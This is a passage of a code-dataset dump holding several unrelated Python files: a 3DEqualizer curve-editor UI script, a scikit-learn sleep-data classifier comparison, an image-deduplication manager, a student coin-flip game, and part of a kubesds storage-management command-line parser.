Keys\",210,5)\r\n\t\t\t\ttde4.setWidgetLinks(anim_req,\"delete_keys_btn\",\"create_update_anim_curves_btn\",\"\",\"curves_area\",\"\")\r\n\t\t\t\ttde4.setWidgetOffsets(anim_req,\"delete_keys_btn\",260,0,5,0)\r\n\r\n\t\t\t\t#add key- button widget...\r\n\t\t\t\ttde4.addButtonWidget(anim_req,\"key-\",\"Previous Key\",90,5)\r\n\t\t\t\ttde4.setWidgetLinks(anim_req,\"key-\",\"create_update_anim_curves_btn\",\"\",\"curves_area\",\"\")\r\n\t\t\t\ttde4.setWidgetOffsets(anim_req,\"key-\",500,0,5,0)\r\n\r\n\t\t\t\t#add key+ button widget...\r\n\t\t\t\ttde4.addButtonWidget(anim_req,\"key+\",\"Next Key\",75,5)\r\n\t\t\t\ttde4.setWidgetLinks(anim_req,\"key+\",\"key-\",\"\",\"curves_area\",\"\")\r\n\t\t\t\ttde4.setWidgetOffsets(anim_req,\"key+\",605,0,5,0)\r\n\r\n\t\t\t\t#add view all button...\r\n\t\t\t\ttde4.addButtonWidget(anim_req,\"view_all\",\"View All\",70,5)\r\n\t\t\t\ttde4.setWidgetLinks(anim_req,\"view_all\",\"key+\",\"\",\"curves_area\",\"\")\r\n\t\t\t\ttde4.setWidgetOffsets(anim_req,\"view_all\",695,0,5,0)\r\n\r\n\t\t\t\t#create emphty curve lists...\r\n\t\t\t\tpos_x_curves_list = []\r\n\t\t\t\tpos_y_curves_list = []\r\n\t\t\t\tpos_z_curves_list = []\r\n\t\t\t\trot_x_curves_list = []\r\n\t\t\t\trot_y_curves_list = []\r\n\t\t\t\trot_z_curves_list = []\r\n\t\t\t\tscale_curves_list = []\r\n\t\t\t\tvisibility_curves_list = []\r\n\t\t\t\talpha_curves_list = []\r\n\r\n\t\t\t\t#create position curves...\r\n\t\t\t\tfor i in range(len(mlist)):\r\n\t\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\t\tpos_x_curves_list.append(curve_id)\r\n\t\t\t\tfor i in range(len(mlist)):\r\n\t\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\t\tpos_y_curves_list.append(curve_id)\r\n\t\t\t\tfor i in range(len(mlist)):\r\n\t\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\t\tpos_z_curves_list.append(curve_id)\r\n\t\t\t\t#create rotation curves...\r\n\t\t\t\tfor i in range(len(mlist)):\r\n\t\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\t\trot_x_curves_list.append(curve_id)\r\n\t\t\t\tfor i in range(len(mlist)):\r\n\t\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\t\trot_y_curves_list.append(curve_id)\r\n\t\t\t\tfor i in range(len(mlist)):\r\n\t\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\t\trot_z_curves_list.append(curve_id)\r\n\t\t\t\t#create scale curves...\r\n\t\t\t\tfor i in range(len(mlist)):\r\n\t\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\t\tscale_curves_list.append(curve_id)\r\n\t\t\t\t#create visibility curves...\r\n\t\t\t\tfor i in range(len(mlist)):\r\n\t\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\t\tvisibility_curves_list.append(curve_id)\t\r\n\t\t\t\t#create alpha curves...\r\n\t\t\t\tfor i in range(len(mlist)):\r\n\t\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\t\talpha_curves_list.append(curve_id)\r\n\r\n\t\t\t\ttde4.detachCurveAreaWidgetAllCurves(anim_req,\"curves_area\")\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",pos_x_curves_list[0],1.0,0.4,0.4,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetXOffset(anim_req,\"curves_area\",frame_offset-1)\r\n\r\n\t\t\t\t#deselect 3DModels after requester opened...\r\n\t\t\t\tfor model in mlist:\r\n\t\t\t\t\ttde4.set3DModelSelectionFlag(pg,model,0)\r\n\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"view_all\",\"Anim_Main_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"view_all_menu_widget\",\"Anim_Main_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"curves_area\",\"Curvearea_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"key-\",\"Anim_Main_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"key+\",\"Anim_Main_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"jump_previous_key\",\"Anim_Main_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"jump_next_key\",\"Anim_Main_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"delete_keys_btn\",\"Anim_Main_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"menu_bar\",\"Editmenu_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"minus\",\"Anim_Main_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"plus\",\"Anim_Main_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"model_list\",\"Anim_Main_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"curves_list\",\"Anim_Main_Callback\")\r\n\t\t\t\ttde4.setWidgetCallbackFunction(anim_req,\"create_update_anim_curves_btn\",\"Anim_Main_Callback\")\r\n\r\n\r\n\r\n\t\t\ttde4.postCustomRequesterAndContinue(anim_req,window_title,1200,800,\"Realtime_Update\")\r\n\t\t\ttde4.updateGUI()\r\n\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1.0,frames,-0.2,1.0)\r\n\r\n\t\telse:\r\n\t\t\ttde4.postQuestionRequester(window_title,\"Error, all selected 3DModel(s) should not contain SurveyData.\",\"Ok\")\r\n\telse:\r\n\t\ttde4.postQuestionRequester(window_title,\"Error, atleast one 3DModel must be selected.\",\"Ok\")\r\nelse:\r\n\ttde4.postQuestionRequester(window_title,\"Error, only 'CAMERA PGroup' 3DModels can be animated.\",\"Ok\")\n","sub_path":"r6_r7/old/3DModel_Animation_CurveEditor_v1.0b3.py","file_name":"3DModel_Animation_CurveEditor_v1.0b3.py","file_ext":"py","file_size_in_byte":30675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"166281364","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 26 16:38:18 2018\n\n@author: aoanng\n\"\"\"\n\nimport csv\nfrom random import seed\nfrom random import randrange\nimport numpy as np\nimport xlrd\n\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.datasets import make_blobs\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVR # SVM中的回归算法\nfrom sklearn.svm import SVC\nfrom sklearn import metrics #模型结果评价包\nimport matplotlib.pyplot as plt\n\n\n\ndef loadData(filename):#加载数据,一行行的存入列表\n data_workbook = xlrd.open_workbook(filename)\n data_sheet_names = data_workbook.sheet_names()\n all_data = list()\n for sht_name in data_sheet_names:\n sheet = data_workbook.sheet_by_name(sht_name)\n for idx in range(1, sheet.nrows):\n dat = sheet.row_values(idx) # 获取第idx列内容\n all_data.append(np.array(dat[:5]))\n\n cls_np = np.stack(all_data, axis=0)\n\n X = cls_np[:, 1:5].astype(float)\n\n Y = (cls_np[:, 0]-2).astype(int)\n\n return X, Y\n\n\nif __name__ == '__main__':\n seed(1)\n X, Y = loadData('sleepdata.xlsx')\n data_X = preprocessing.StandardScaler().fit_transform(X)\n\n random_seed = 1997 #2020, 0, 1997\n\n X_train, X_test, y_train, y_test = train_test_split(data_X, Y, test_size=0.9, random_state=random_seed, shuffle=True)\n\n svm = SVC(kernel='rbf', C=30, gamma=0.75, probability=True, max_iter=1000).fit(X_train, y_train)\n\n tr_p = svm.predict(X_test)\n print(\"SVC :\")\n print(metrics.r2_score(y_test, tr_p))\n print(metrics.mean_squared_error(y_test, tr_p))\n\n\n # ## 决策树\n clf1 = DecisionTreeClassifier(max_depth=None, min_samples_split=2, random_state=random_seed).fit(X_train, y_train)\n tr_p = clf1.predict(X_test)\n print(\"决策树 :\")\n print(metrics.r2_score(y_test, tr_p))\n print(metrics.mean_squared_error(y_test, tr_p))\n\n\n ## 随机森林\n clf2 = RandomForestClassifier(n_estimators=100, max_depth=None,\n min_samples_split=2, random_state=random_seed).fit(X_train, y_train)\n tr_p = clf2.predict(X_test)\n print(\"随机森林:\")\n print(metrics.r2_score(y_test, tr_p))\n print(metrics.mean_squared_error(y_test, tr_p))\n\n\n ## ExtraTree分类器集合\n clf3 = ExtraTreesClassifier(n_estimators=100, max_depth=None,\n min_samples_split=2, random_state=random_seed).fit(X_train, y_train)\n tr_p = clf3.predict(X_test)\n print(\"ExtraTree分类器集合:\")\n print(metrics.r2_score(y_test, tr_p))\n print(metrics.mean_squared_error(y_test, tr_p))\n","sub_path":"SleepClasser2/ML-model/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"377071891","text":"'''\nCreated on Aug 26, 2019\n\n@author: latikamehra\n'''\n\nfrom manageDuplicates import CleanupDuplicates\nimport time\n\nclass Manage():\n \n def __init__(self, obj):\n self.RvwdBckp = obj.RvwdBckp\n \n self.imgDir, self.toKeepDir, self.secDupesDir = obj.imgDir, obj.toKeepDir, obj.secDupesDir\n \n self.pp = obj.pp\n self.sep1 = obj.sep1\n \n self.op_summary = obj.op_summary\n \n self.getDupeCount = obj.getDupeCount\n \n self.deletedCount = 0\n \n \n def manage(self, manualReview): \n self.reviewedDupeDict = self.RvwdBckp.readDict()\n \n if len(self.reviewedDupeDict) >= 1 :\n \n clnp = CleanupDuplicates.Cleanup(self.imgDir, self.toKeepDir, self.secDupesDir)\n \n clnp.moveDuplicates(self.reviewedDupeDict, not manualReview)\n \n time.sleep(5)\n \n clnp.moveDupesToKeepToOriginalDir(not manualReview)\n \n time.sleep(5)\n \n self.deletedCount = clnp.removeDuplicates(not manualReview)\n \n else :\n print(\"No reviewed duplicate files found in the directory.\\nSkipping\")\n #quit()\n \n self.printSummaryInfo() \n \n def printSummaryInfo(self):\n prntStr = \"\"\n \n prntStr += \"\\n\\n\"\n prntStr += self.pp.cat([self.sep1])\n prntStr += self.pp.cat([\"Number of duplicates removed = \"+str(self.deletedCount)])\n prntStr += self.pp.cat([self.sep1])\n \n self.op_summary.info(prntStr)\n \n ","sub_path":"ImageDeduplicator_PixelAnalysis/execs/ManageDuplicates.py","file_name":"ManageDuplicates.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"418690820","text":"\n################################\n################################\n## Author : Erik Marquez\n## Due : 9.1.2018\n## Class : comp sci 101 -002 TuTh 5:30-6:45\n## program number:2. Greedy Coins\n##\n## Two player coin game, played by flipping 3 coins\n## first player to reach 20 wins\n##\n## Step 1. Prompt user to enter name\n## Step 2. Play greedy coins by flipping three coins. \n## Step 3. ask player if he wants to play again\n################################\n\n\nimport random\ndef user_action():\n \"\"\"User decides to flip or hold\"\"\"\n choice = True\n while choice == True:\n user = input(' (F)lip Again or (H)old?').lower()\n if user == 'f':\n choice = False\n elif user == 'h':\n choice = False\n else:\n choice = True\n return user\n\n###\n### Calling all the veriables\n###\n\ncoin1 = ()\ncoin2 = ()\ncoin3 = ()\n\nplayer_score = 0\nai_score = 0\npot = 0\nai_pot = 0\n\nplayer_win = True\nai_win = False\n\n\nuser = ('f')\n\nplay = 'Y'\n\n##\n## Intro to game\n##\n\nprint('WELCOME TO GREEDY DICE!!\\n')\n\nuser_name = input('What is your name\\n')\n\n\n##\n##Game Loop \n##\n\nwhile play != 'no'and play != 'n':\n\n\n print('SCORE %s : 0 AI : 0 \\n' % user_name)\n\n## \n##Round loop\n##\n \n while ai_score <= 20:\n\n if player_score >= 20:\n break\n \n user = ('f')\n\n if player_win == True:\n play = input('Your turn. Hit enter to continue.\\n')\n\n ###\n ###User Loop Check to see if you need user of player_win\n ###\n while user == 'f':\n\n if player_score >= 20: \n break\n \n if ai_score >= 20:\n break\n\n if player_win == False:\n break\n\n play=()\n user=()\n \n ## Coins User\n \n coin_one = random.randint(0,1)\n coin_two = random.randint(0,1)\n coin_three = random.randint(0,1)\n coins = coin_one + coin_two + coin_three\n pot += coin_one + coin_two + coin_three\n \n if coin_one == 1:\n coin1 = 'H'\n else:\n coin1 = 'T'\n if coin_two == 1:\n coin2 = 'H' \n else:\n coin2 = 'T'\n if coin_three == 1:\n coin3 = 'H'\n else:\n coin3 = 'T'\n##\n##Conditional statments on the round, pot, or user winning\n##\n if coins == 0:\n user = 'f'\n pot = 0\n print('\\ncoins : ',coin1,coin2,coin3,'Pot : ',pot, end = ' ')\n print('BUST \\n \\n')\n break\n\n print('Coins : ',coin1,coin2,coin3,'Pot : ',pot,end=' ')\n\n if pot >= 20:\n player_score += pot\n break\n\n user = user_action()\n \n if user == 'h':\n player_score += pot\n pot = 0\n user = 'f'\n print('\\n \\nSCORE %s : %d AI : %d \\n' % (user_name, player_score, ai_score))\n\n \n if player_score < 20:\n play = input('It’s the computers turn. Hit enter to continue.\\n')\n\n\n \n ###\n ### ai_loop\n ###\n while ai_pot < 8: \n\n if player_score >= 20: \n break\n \n if ai_score >= 20:\n break\n if ai_pot >= 10:\n break\n\n \n player_win = True\n \n \n coin_one = random.randint(0,1)\n coin_two = random.randint(0,1)\n coin_three = random.randint(0,1)\n ai_coins = coin_one + coin_two + coin_three\n ai_pot += coin_one + coin_two + coin_three\n\n if coin_one == 1:\n coin1 = 'H'\n else:\n coin1 = 'T'\n if coin_two == 1:\n coin2 = 'H' \n else:\n coin2 = 'T'\n if coin_three == 1:\n coin3 = 'H'\n else:\n coin3 = 'T'\n##\n##Conditional statments for AI on the round, pot, or user winning\n##\n if ai_coins == 0:\n ai_pot = 0\n print('\\nAI coins : ',coin1,coin2,coin3,'Pot : ',ai_pot, end =' ')\n print('BUST')\n break\n\n print('Coins : ',coin1,coin2,coin3,'Pot : ',ai_pot,)\n\n ai_score += ai_pot\n\n ai_pot = 0\n\n if player_score <= 20: \n print('\\n \\nSCORE %s : %d AI : %d \\n' % (user_name, player_score, ai_score))\n\n\n ##\n ## Winners statments\n ##\n\n if player_score >=20:\n player_win = False\n ai_win = True\n print('%s you are the Winner!! \\n' % user_name)\n\n if ai_score >= 20:\n player_win = True\n ai_win = False\n print('Ai is the Winner\\n')\n\n##\n## Replay\n##\n \n player_score= 0\n ai_score= 0\n play = ()\n\n \n while play != 'n':\n if play == 'no':\n break\n if play == 'y':\n break\n if play == \"yes\":\n break\n \n play=input('Do you want to play Greedy Coin again? (YES/Y/NO/N)\\n')\n play=play.lower()\n\nprint('Thank You for playing!')\n\n","sub_path":"Greedy coins Finished .py","file_name":"Greedy coins Finished .py","file_ext":"py","file_size_in_byte":5244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"376175208","text":"import argparse\n\nfrom operation import *\n\nfrom utils import logger\nfrom utils.exception import ConditionException\n\nLOG = \"/var/log/kubesds3.log\"\n\nlogger = logger.set_logger(os.path.basename(__file__), LOG)\n\nSUPPORT_STORAGE_TYPE = [\"localfs\", \"nfs\", \"glusterfs\"]\n\n\n# os.putenv('LANG', 'en_US.UTF-8')\n\ndef execute(f_name, params):\n moudle = __import__('operation')\n func = getattr(moudle, f_name)\n try:\n check(f_name, params)\n func(params)\n except ExecuteException as e:\n logger.debug(f_name)\n logger.debug(params)\n logger.debug(traceback.format_exc())\n error_print(400, \"error occur while %s. %s\" % (f_name, e.message))\n except Exception:\n logger.debug(f_name)\n logger.debug(params)\n logger.debug(traceback.format_exc())\n error_print(300, \"error occur while %s. traceback: %s\" % (f_name, traceback.format_exc()))\n\n\ndef check(f_name, args):\n check_storage_type(args)\n check_pool(f_name, args)\n\n\ndef check_storage_type(args):\n if hasattr(args, 'type') and args.type not in SUPPORT_STORAGE_TYPE:\n error_print(100, \"unsupported value type: %s\" % args.type)\n\n\n# check pool type, if pool type not match, stop delete pool\ndef check_pool_type(args):\n try:\n if not hasattr(args, 'type'):\n return\n if not hasattr(args, 'pool'):\n return\n if args is None:\n return\n pool_info = get_pool_info_from_k8s(args.pool)\n if pool_info is None:\n error_print(202, \"check_pool_type, cannot get pool info from k8s.\")\n if pool_info['pooltype'] == args.type:\n return\n else:\n error_print(221, \"check_pool_type, pool type is not match. given is %s, actual is %s\" % (\n args.type, pool_info['pooltype']))\n except ExecuteException:\n logger.debug(traceback.format_exc())\n error_print(202, \"check_pool_type, cannot get pool info from k8s.\")\n\n\ndef check_pool(f_name, args):\n try:\n if f_name == 'cloneDisk':\n return\n if not hasattr(args, 'type'):\n return\n if not hasattr(args, 'pool'):\n return\n if f_name == 'createPool':\n if is_pool_exists(args.uuid):\n raise ConditionException(201, \"virsh pool %s has exist\" % args.uuid)\n else:\n if f_name == 'deletePool':\n # if pool is not create successful, delete it from k8s.\n helper = K8sHelper(\"VirtualMachinePool\")\n pool_info = helper.get_data(args.pool, \"pool\")\n if pool_info is None:\n helper.delete(args.pool)\n success_print(\"delete pool %s successful.\" % args.pool, {})\n\n check_pool_type(args)\n pool_info = get_pool_info_from_k8s(args.pool)\n pool = pool_info['poolname']\n if not is_pool_exists(pool):\n raise ConditionException(203, \"virsh pool %s not exist\" % pool)\n except ExecuteException as e1:\n logger.debug(traceback.format_exc())\n error_print(202, \"check_pool, cannot get pool info. %s\" % e1.message)\n except ConditionException as e2:\n logger.debug(traceback.format_exc())\n error_print(e2.code, e2.msg)\n\n\ndef is_virsh_disk_exist(pool, diskname):\n pool_info = get_pool_info(pool)\n if os.path.isdir('%s/%s' % (pool_info['path'], diskname)):\n return True\n return False\n\n\ndef check_virsh_disk_exist(pool, diskname):\n pool_info = get_pool_info(pool)\n if os.path.isdir('%s/%s' % (pool_info['path'], diskname)):\n error_print(207, \"virsh disk %s is in pool %s\" % (diskname, pool))\n\n\ndef check_virsh_disk_not_exist(pool, diskname):\n pool_info = get_pool_info(pool)\n if not os.path.isdir('%s/%s' % (pool_info['path'], diskname)):\n error_print(209, \"virsh disk %s is not in pool %s\" % (diskname, pool))\n\n\ndef check_virsh_disk_snapshot_exist(pool, diskname, snapshot):\n pool_info = get_pool_info(pool)\n if os.path.exists('%s/%s/snapshots/%s' % (pool_info['path'], diskname, snapshot)):\n error_print(209, \"virsh disk snapshot %s is in volume %s\" % (snapshot, diskname))\n\n\ndef check_virsh_disk_snapshot_not_exist(pool, diskname, snapshot):\n pool_info = get_pool_info(pool)\n if not os.path.exists('%s/%s/snapshots/%s' % (pool_info['path'], diskname, snapshot)):\n error_print(209, \"virsh disk snapshot %s is not in volume %s\" % (snapshot, diskname))\n\n\ndef check_virsh_disk_size(pool, vol, size):\n if get_volume_size(pool, vol) >= int(size):\n error_print(213, \"new disk size must larger than the old size.\")\n\n\ndef createPoolParser(args):\n if args.content is None:\n error_print(100, \"less arg, content must be set\")\n if args.content not in [\"vmd\", \"vmdi\", \"iso\"]:\n error_print(100, \"less arg, content just can be vmd, vmdi, iso\")\n\n execute('createPool', args)\n\n\ndef deletePoolParser(args):\n execute('deletePool', args)\n\n\ndef startPoolParser(args):\n execute('startPool', args)\n\n\ndef autoStartPoolParser(args):\n execute('autoStartPool', args)\n\n\ndef stopPoolParser(args):\n execute('stopPool', args)\n\n\ndef showPoolParser(args):\n execute('showPool', args)\n\n\ndef createDiskParser(args):\n pool_info = get_pool_info_from_k8s(args.pool)\n pool = pool_info['poolname']\n if args.format is None:\n error_print(100, \"less arg, format must be set\")\n check_virsh_disk_exist(pool, args.vol)\n\n check_pool_active(pool_info)\n execute('createDisk', args)\n\n\ndef deleteDiskParser(args):\n try:\n helper = K8sHelper(\"VirtualMachineDisk\")\n disk_info = helper.get_data(args.vol, \"volume\")\n if disk_info is None:\n helper.delete(args.vol)\n success_print(\"delete disk %s successful.\" % args.vol, {})\n except ExecuteException as e:\n error_print(400, e.message)\n pool_info = get_pool_info_from_k8s(args.pool)\n pool = pool_info['poolname']\n check_pool_active(pool_info)\n check_virsh_disk_not_exist(pool, args.vol)\n execute('deleteDisk', args)\n\n\ndef resizeDiskParser(args):\n pool_info = get_pool_info_from_k8s(args.pool)\n pool = pool_info['poolname']\n check_pool_active(pool_info)\n check_virsh_disk_not_exist(pool, args.vol)\n check_virsh_disk_size(pool, args.vol, args.capacity)\n\n execute('resizeDisk', args)\n\n\ndef cloneDiskParser(args):\n pool_info = get_pool_info_from_k8s(args.pool)\n # pool = pool_info['poolname']\n try:\n disk_info = get_vol_info_from_k8s(args.newname)\n error_print(500, \"vol %s has exist in k8s.\" % args.newname)\n except ExecuteException:\n pass\n\n check_pool_active(pool_info)\n # check_virsh_disk_not_exist(pool, args.vol)\n # check_virsh_disk_exist(pool, args.newname)\n\n execute('cloneDisk', args)\n\n\ndef registerDiskToK8sParser(args):\n execute('registerDiskToK8s', args)\n\n\ndef rebaseDiskSnapshotParser(args):\n execute('rebaseDiskSnapshot', args)\n\n\ndef showDiskParser(args):\n pool_info = get_pool_info_from_k8s(args.pool)\n check_pool_active(pool_info)\n pool = pool_info['poolname']\n check_virsh_disk_not_exist(pool, args.vol)\n\n execute('showDisk', args)\n\n\ndef prepareDiskParser(args):\n execute('prepareDisk', args)\n\n\ndef releaseDiskParser(args):\n execute('releaseDisk', args)\n\n\ndef showDiskSnapshotParser(args):\n pool_info = get_pool_info_from_k8s(args.pool)\n check_pool_active(pool_info)\n\n pool = pool_info['poolname']\n check_virsh_disk_snapshot_not_exist(pool, args.vol, args.name)\n\n execute('showDiskSnapshot', args)\n\n\ndef createExternalSnapshotParser(args):\n pool_info = get_pool_info_from_k8s(args.pool)\n check_pool_active(pool_info)\n\n pool = pool_info['poolname']\n if args.format is None:\n error_print(100, \"less arg, format must be set\")\n check_virsh_disk_snapshot_exist(pool, args.vol, args.name)\n\n disk_dir = '%s/%s' % (get_pool_info(pool)['path'], args.vol)\n config_path = '%s/config.json' % disk_dir\n with open(config_path, \"r\") as f:\n config = load(f)\n if not os.path.isfile(config['current']):\n error_print(100, \"can not find vol current %s.\" % config['current'])\n if os.path.isfile('%s/snapshots/%s' % (disk_dir, args.name)):\n error_print(100, \"snapshot file has exist\")\n\n execute('createExternalSnapshot', args)\n\n\ndef revertExternalSnapshotParser(args):\n pool_info = get_pool_info_from_k8s(args.pool)\n check_pool_active(pool_info)\n\n pool = pool_info['poolname']\n if args.format is None:\n error_print(100, \"less arg, format must be set\")\n\n check_virsh_disk_snapshot_not_exist(pool, args.vol, args.name)\n\n disk_dir = '%s/%s' % (get_pool_info(pool)['path'], args.vol)\n config_path = '%s/config.json' % disk_dir\n with open(config_path, \"r\") as f:\n config = load(f)\n\n if not os.path.isfile(config['current']):\n error_print(100, \"can not find current file\")\n execute('revertExternalSnapshot', args)\n\n\ndef deleteExternalSnapshotParser(args):\n try:\n helper = K8sHelper(\"VirtualMachineDiskSnapshot\")\n ss_info = helper.get_data(args.name, \"volume\")\n if ss_info is None:\n helper.delete(args.name)\n success_print(\"delete snapshot %s successful.\" % args.name, {})\n except ExecuteException as e:\n error_print(400, e.message)\n pool_info = get_pool_info_from_k8s(args.pool)\n check_pool_active(pool_info)\n\n pool = pool_info['poolname']\n check_virsh_disk_snapshot_not_exist(pool, args.vol, args.name)\n\n disk_dir = '%s/%s' % (get_pool_info(pool)['path'], args.vol)\n ss_path = '%s/snapshots/%s' % (disk_dir, args.name)\n if not os.path.isfile(ss_path):\n error_print(100, \"snapshot file not exist\")\n\n execute('deleteExternalSnapshot', args)\n\n\ndef updateDiskCurrentParser(args):\n for current in args.current:\n if not os.path.isfile(current):\n error_print(100, \"disk current path %s not exists!\" % current)\n\n execute('updateDiskCurrent', args)\n\n\ndef customizeParser(args):\n execute('customize', args)\n\n\ndef createDiskFromImageParser(args):\n pool_info = get_pool_info_from_k8s(args.targetPool)\n check_pool_active(pool_info)\n\n pool = pool_info['poolname']\n check_pool_active(pool_info)\n\n execute('createDiskFromImage', args)\n\n\ndef migrateParser(args):\n if not re.match('^((2(5[0-5]|[0-4]\\d))|[0-1]?\\d{1,2})(\\.((2(5[0-5]|[0-4]\\d))|[0-1]?\\d{1,2})){3}$', args.ip):\n error_print(100, \"ip is not right\")\n execute('migrate', args)\n\n\ndef migrateDiskParser(args):\n execute('migrateDisk', args)\n\n\ndef migrateVMDiskParser(args):\n execute('migrateVMDisk', args)\n\n\ndef changeDiskPoolParser(args):\n execute('changeDiskPool', args)\n\n\ndef modifyVMParser(args):\n execute('modifyVM', args)\n\n\ndef exportVMParser(args):\n try:\n execute('exportVM', args)\n vm_heler = K8sHelper('VirtualMachine')\n vm_heler.delete_lifecycle(args.domain)\n except Exception as e:\n raise e\n\n\ndef backupVMParser(args):\n pool_info = get_pool_info_from_k8s(args.pool)\n check_pool_active(pool_info)\n try:\n execute('backupVM', args)\n vm_heler = K8sHelper('VirtualMachine')\n vm_heler.delete_lifecycle(args.domain)\n except Exception as e:\n raise e\n\n\ndef restoreVMParser(args):\n pool_info = get_pool_info_from_k8s(args.pool)\n check_pool_active(pool_info)\n if args.target:\n pool_info = get_pool_info_from_k8s(args.target)\n check_pool_active(pool_info)\n execute('restoreVM', args)\n\n\ndef backupDiskParser(args):\n pool_info = get_pool_info_from_k8s(args.pool)\n check_pool_active(pool_info)\n execute('backupDisk', args)\n\n\ndef restoreDiskParser(args):\n pool_info = get_pool_info_from_k8s(args.pool)\n check_pool_active(pool_info)\n if args.target:\n pool_info = get_pool_info_from_k8s(args.target)\n check_pool_active(pool_info)\n execute('restoreDisk', args)\n\n\ndef showDiskPoolParser(args):\n execute('showDiskPool', args)\n\n\ndef deleteVMBackupParser(args):\n execute('deleteVMBackup', args)\n\n\ndef deleteVMDiskBackupParser(args):\n execute('deleteVMDiskBackup', args)\n\n\ndef deleteRemoteBackupParser(args):\n execute('deleteRemoteBackup', args)\n\n\ndef pullRemoteBackupParser(args):\n execute('pullRemoteBackup', args)\n\n\ndef pushBackupParser(args):\n # if args.vol:\n # execute('pushVMDiskBackup', args)\n # else:\n # execute('pushVMBackup', args)\n execute('pushVMBackup', args)\n\n\ndef createCloudInitUserDataImageParser(args):\n execute('createCloudInitUserDataImage', args)\n\n\ndef deleteCloudInitUserDataImageParser(args):\n execute('deleteCloudInitUserDataImage', args)\n\n\ndef updateOSParser(args):\n execute('updateOS', args)\n\n\ndef cleanBackupParser(args):\n execute('cleanBackup', args)\n\n\ndef cleanRemoteBackupParser(args):\n execute('cleanRemoteBackup', args)\n\n\ndef scanBackupParser(args):\n execute('scanBackup', args)\n\n\ndef deleteRemoteBackupServerParser(args):\n execute('deleteRemoteBackupServer', args)\n\n\n# --------------------------- cmd line parser ---------------------------------------\nparser = argparse.ArgumentParser(prog=\"kubesds-adm\", description=\"All storage adaptation tools\")\n\nsubparsers = parser.add_subparsers(help=\"sub-command help\")\n\n# -------------------- add createPool cmd ----------------------------------\nparser_create_pool = subparsers.add_parser(\"createPool\", help=\"createPool help\")\nparser_create_pool.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\n\nparser_create_pool.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool name to delete\")\n\n# localfs, nfs and glusterfs only, target will transfer to path in nfs and glusterfs\nparser_create_pool.add_argument(\"--url\", required=True, metavar=\"[URL]\", type=str,\n help=\"storage pool create location\")\n\n# set autostart\nparser_create_pool.add_argument(\"--autostart\", metavar=\"[AUTOSTART]\", type=bool, nargs='?', const=True,\n help=\"if autostart, pool will set autostart yes after create pool\")\n\n# set content\nparser_create_pool.add_argument(\"--content\", metavar=\"[CONTENT]\", type=str,\n help=\"pool content\")\n\n# nfs only\nparser_create_pool.add_argument(\"--opt\", metavar=\"[OPT]\", type=str,\n help=\"nfs require or nfs mount options\")\n\n# nfs and glusterfs only\nparser_create_pool.add_argument(\"--uuid\", metavar=\"[UUID]\", type=str,\n help=\"nfs or glusterfs poolname \")\n\n# set default func\nparser_create_pool.set_defaults(func=createPoolParser)\n\n# -------------------- add deletePool cmd ----------------------------------\nparser_delete_pool = subparsers.add_parser(\"deletePool\", help=\"deletePool help\")\nparser_delete_pool.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\n\nparser_delete_pool.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool name to delete\")\n# set default func\nparser_delete_pool.set_defaults(func=deletePoolParser)\n\n# -------------------- add startPool cmd ----------------------------------\nparser_start_pool = subparsers.add_parser(\"startPool\", help=\"startPool help\")\nparser_start_pool.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", type=str,\n help=\"storage pool type to use\")\n\nparser_start_pool.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool name to delete\")\n# set default func\nparser_start_pool.set_defaults(func=startPoolParser)\n\n# -------------------- add autoStartPool cmd ----------------------------------\nparser_autostart_pool = subparsers.add_parser(\"autoStartPool\", help=\"autoStartPool help\")\nparser_autostart_pool.add_argument(\"--type\", required=True, metavar=\"[localfs|nfs|glusterfs]\", 